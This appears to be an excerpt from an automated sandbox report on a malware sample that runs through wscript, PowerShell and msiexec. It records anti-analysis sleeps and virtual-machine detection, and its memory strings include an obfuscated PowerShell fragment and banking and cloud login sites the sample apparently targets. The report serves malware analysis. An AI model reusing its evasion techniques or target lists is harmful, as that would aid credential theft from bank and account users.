Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599545 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599433 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599219 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599094 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598984 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598875 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598764 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598651 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598546 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598426 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598297 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598187 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598074 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597969 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597844 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597734 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597625 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597516 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597405 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597297 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597187 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597077 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596969 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596859 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596747 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596631 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596500 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596389 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596280 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596162 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596016 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595891 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595781 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595656 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595547 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595437 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595326 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595219 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595109 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594988 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594859 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594743 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594625 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594515 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594406 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594293 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3484 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6396 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6046 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3703 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 7508 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -29514790517935264s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5916 Thread sleep count: 3182 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5916 Thread sleep count: 6658 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -599545s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -599433s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -599328s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -599219s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -599094s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -598984s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -598875s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -598764s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -598651s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -598546s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -598426s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -598297s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -598187s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -598074s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -597969s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -597844s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -597734s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -597625s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -597516s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -597405s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -597297s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -597187s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -597077s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -596969s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -596859s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -596747s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -596631s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -596500s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -596389s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -596280s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -596162s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -596016s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -595891s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -595781s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -595656s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -595547s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -595437s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -595326s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -595219s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -595109s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -594988s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -594859s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -594743s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -594625s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -594515s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -594406s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6912 Thread sleep time: -594293s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599545 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599433 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599219 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599094 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598984 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598875 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598764 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598651 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598546 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598426 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598297 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598187 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598074 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597969 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597844 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597734 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597625 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597516 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597405 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597297 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597187 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597077 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596969 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596859 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596747 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596631 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596500 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596389 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596280 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596162 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596016 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595891 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595781 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595656 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595547 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595437 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595326 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595219 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595109 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594988 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594859 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594743 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594625 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594515 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594406 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594293 Jump to behavior
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: wscript.exe, 00000000.00000003.1341414760.0000020B00C0D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\&
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: wscript.exe, 00000000.00000003.1310601389.0000020B02AB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1342854505.0000020B00C1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341504506.0000020B02AB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310547788.0000020B00C02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1309442096.0000020B02AB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341717301.0000020B02AB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310965896.0000020B00C2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341227470.0000020B00C13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341647462.0000020B00C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1343000144.0000020B02AB6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: powershell.exe, 00000003.00000002.1556524743.000002673FA05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW.q%SystemRoot%\system32\mswsock.dlllpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitQ
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: wscript.exe, 00000000.00000003.1341974842.0000020B00B80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&04=5
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
